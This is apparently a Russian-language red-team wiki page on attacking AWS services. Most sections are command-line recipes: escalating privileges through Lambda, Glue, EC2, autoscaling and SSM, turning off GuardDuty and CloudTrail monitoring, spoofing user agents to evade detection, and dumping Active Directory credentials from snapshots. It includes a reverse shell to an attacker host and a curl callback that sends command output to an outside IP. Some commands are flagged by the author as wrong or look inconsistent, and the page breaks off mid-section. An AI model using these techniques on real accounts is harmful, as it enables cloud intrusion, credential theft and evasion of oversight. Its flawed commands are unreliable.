* User Pools - для тех, кому нужна только регистрация и аутентификация

* Identity Pools - для тех, кому еще и нужен доступ к AWS-ресурсам.

=== X-Amz-Target (Endpoints) ===

==== AWSCognitoIdentityService.UpdateUserAttributes ====

У каждого пользователя есть поля, которые могут быть установлены самим пользователем (например, фамилия или дата рождения). Но также это могут быть и критичные поля, такие, как ID пользователя, администратор ли он и так далее.

Также раньше можно было менять поле email'а пользователя (0day): https://infosecwriteups.com/hacking-aws-cognito-misconfiguration-to-zero-click-account-takeover-36a209a0bd8a

Важно! Указано, что могут быть отправки СМС-уведомлений, так что тестировать осторожно.

P.S. Мб неверно название Endpoint'а. Надо проверять.

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Позволяет получить AWS ключи для работы с AWS-консолью. По-умолчанию отключено.

Требуется aws_identity_pool_id.

В некоторых примерах оно также было указано как "com.amazonaws.cognito.identity.model.AWSCognitoIdentityService.GetCredentialsForIdentity"

Подробнее тут: https://blog.appsecco.com/exploiting-weak-configurations-in-amazon-cognito-in-aws-471ce761963

==== AWSCognitoIdentityService.GetOpenIdToken ====

Позволяет получить OpenID токен, действительный на 10 минут.

В примере требуется только "IdentityID"

==== AWSCognitoIdentityService.GetOpenIdTokenForDeveloperIdentity ====

Тоже позволяет получить OpenID токен, действительный на 10 минут. Но также создает новый "IdentityID" (если он не был указан).

==== AWSCognitoIdentityService.GetCredentialsForIdentity ====

Получить учетные данные пользователя по IdentityID: SecretKey, SessionToken, AccessKeyID.

https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html

== GuardDuty ==

Сервис для детектирования атак используя машинное обучение.

Для детекта использует следующие сервисы:

* CloudTrail
* VPC Flow Logs
* DNS Logs
* ...to be continued

=== Обход защиты ===

Далее идут правила детекта и то, как их можно обойти.

==== UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration ====

Детектит, если AWS-API команды были запущены за пределами EC2 (используя токен этого EC2).

Правило эффективно, если хакер хочет украть токен с EC2 и использовать его вне EC2 (например, если есть только SSRF).

Обход простой: создать свой EC2-инстанс и делать API-запросы с полученными учетными данными жертвы.
Тогда правило не сработает, даже если учетные данные не принадлежат данной EC2 тк правило проверяет source ip и является ли он EC2.

Может быть для этого выгодно держать проксирующий сервер EC2.

==== UserAgent rules ====

Суть в том, что GuardDuty будет добавлять Alert если AWS-CLI использует UserAgent например Kali.
Варианты:

* Использовать утилиту pacu (уже есть смена User-Agent)

* Отредактировать botocore(https://github.com/boto/botocore) по пути /usr/local/lib/python3.7/dist-packages/botocore/session.py: поменять platform.release() на строку юзерагента.

=== Роли - Управление ===

Список ролей: https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonguardduty.html

==== guardduty:UpdateDetector ====

Позволяет выключить GuardDuty (ну или редатировать правила):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty update-detector --detector-id <id of detector> --no-enable
</syntaxhighlight>
==== guardduty:DeleteDetector ====

Удалить правило детектирования:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
aws guardduty delete-detector --detector-id <id of detector>
</syntaxhighlight>

== STS (Security Token Service) ==

Сервис, позволяющий запросить временные учетные данные с ограниченными примилегиями для IAM-пользователей

== KMS (Key Management Service) ==

Сервис для создания криптографических ключей, управления ими и использования их в других сервисах.

Администраторы амазона не смогут получить к ним доступ.

Ключи со временем обновляются:

* Customers keys - раз в 365 дней

* AWS keys - раз в 3 года.

Старые ключи также можно будет использовать для расшифровки.

== CloudHSM (Hardware Security Module) ==

Замена KMS для богатых и тех, кто хочит побольше безопасности. Хранилище ключей, прикрепленное к аппаратному решению.

Пишут, что устройство будет закреплено только за вами.

Также можно получить доступ к CloudHSM-Instance по SSH.

== Athena ==

Интерактивный бессерверный сервис, позволяющий анализировать данные хранилища S3 стандартными средствами SQL.

Умеет работать с шифрованными S3 и сохранять шифрованный вывод.

== EBS (Elastic Block Store) ==

Сервис блочного хранилища (просто жесткий диск, который можно примонтировать).

=== Роли - управление сервисом ===

==== ec2:CreateVolume + ec2:AttachVolume ====

Возможность подключить EBS-Volume/Snapshot к EC2-виртуалке.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание Volume из snapshot'а (если требуется подключить snapshot)
aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
# Подключение Volume к виртуалке EC2
</syntaxhighlight>

Далее идем на виртуалку и вводим команды:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Поиск Volume
lsblk
# Проверка есть ли на нем данные
sudo file -s /dev/xvdf
# форматировать образ под ext4 (если неподходящая файловая система)
sudo mkfs -t ext4 /dev/xvdf
# Создаем директорию куда примонтируем позже
sudo mkdir /tmp/newvolume
# Монтируем
sudo mount /dev/xvdf /tmp/newvolume/
</syntaxhighlight>

Диск будет доступен на /tmp/newvolume.

== Lambda ==

Сервис для запуска своего кода в облаке.

=== Роли - повышение привилегий ===

==== lambda:UpdateFunctionCode ====

Позволяет поменять запущенный код, тем самым получив контроль над ролями, прикрепленными к этому коду:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws lambda update-function-code --function-name target_function --zip-file fileb://my/lambda/code/zipped.zip
</syntaxhighlight>

==== lambda:CreateFunction + lambda:InvokeFunction + iam:PassRole ====

Позволяет создать функцию и прикрепить к ней произвольную роль, после чего запустить.

Код функции:
<syntaxhighlight lang="python" line="1" enclose="div" style="overflow-x:scroll" >
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
</syntaxhighlight>

Команды для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создание функции
aws lambda create-function --function-name my_function --runtime python3.6 --role arn_of_lambda_role --handler lambda_function.lambda_handler --code file://my/python/code.py
# Запуск
aws lambda invoke --function-name my_function output.txt
</syntaxhighlight>

=== Роли - управление ===

==== lambda:GetFunction ====

Также может понадобиться lambda:ListFunctions чтобы не перебирать названия функций.

Позволяет прочитать исходный код функции (в котором например может быть секрет сохранен):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получить список функций
aws lambda list-functions --profile uploadcreds
# Получить информацию о Lambda-функции
aws lambda get-function --function-name "LAMBDA-NAME-HERE-FROM-PREVIOUS-QUERY" --query 'Code.Location' --profile uploadcreds
# Скачать исходный код по ссылке из предыдущего ответа
wget -O lambda-function.zip url-from-previous-query --profile uploadcreds
</syntaxhighlight>

== Glue ==

Бессерверная служба интеграции данных, упрощающая поиск, подготовку и объединение данных для анализа, машинного обучения и разработки приложений.

=== Роли - повышение привилегий ===

==== glue:UpdateDevEndpoint ====

Позволяет обновить параметры Glue Development Endpoint, тем самым получив контроль над ролями, прикрепленными к этому Glue Development Endpoint:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# TODO: это не обновление параметров, надо обновить команду
aws glue --endpoint-name target_endpoint --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
